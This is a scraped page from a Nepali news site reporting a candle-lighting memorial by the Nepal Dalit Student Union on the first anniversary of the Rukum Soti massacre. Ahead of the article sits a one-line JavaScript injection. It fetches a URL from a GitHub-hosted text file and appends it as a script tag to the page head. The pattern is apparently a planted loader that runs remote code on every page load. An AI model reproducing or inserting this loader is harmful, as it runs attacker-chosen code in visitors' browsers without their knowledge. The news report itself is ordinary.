;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेपाल दलित विद्यार्थी संघ केन्द्रद्वारा रुकुम घटनाको पहिलो स्मृतिमा द्वीप प्रजवलन कार्यक्रम – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • नेपाल दलित विद्यार्थी संघ केन्द्रद्वारा रुकुम घटनाको पहिलो स्मृतिमा द्वीप प्रजवलन कार्यक्रम
दुर्घटना/अपराध

नेपाल दलित विद्यार्थी संघ केन्द्रद्वारा रुकुम घटनाको पहिलो स्मृतिमा द्वीप प्रजवलन कार्यक्रम

जेठ १० , काठमाडौं ।


रुकुम सोति नरसंहार भएको एक बर्ष पूरा हुँदै गर्दा पनि न्याय नपाएको भन्दै सामाजिक अभियन्ताहरुले पहिलो स्मृति मनाएका छन् ।

समाजसेवी तथा नेपाल दलित विद्यार्थी संघका केन्द्रिय अध्यक्ष राजु सुनार ज्यू को संयोजकत्वमा आज द्वीप प्रज्वलन गरेर स्मृति मनाएको हुन ।

प्रेमको यथार्थमा जातियताको मुद्दाले ठूलो रूप लिदै गर्दा आज सम्म पनि मृतकका आमा बुबाका आखा ओभानो हुन सकेको छैन भन्दै, अदालतले पिडितलाइ न्याय र आरोपिलाइ दण्ड दिन नसकिरहेको त्यो कालो दिनलाइ स्मरण गर्दै जय नेपाल संचार गृहमा श्रद्धाञ्जली एवं द्विप- प्रज्वलन कार्यक्रम गरिएको हो।

फेसबुक प्रतिक्रियाहरु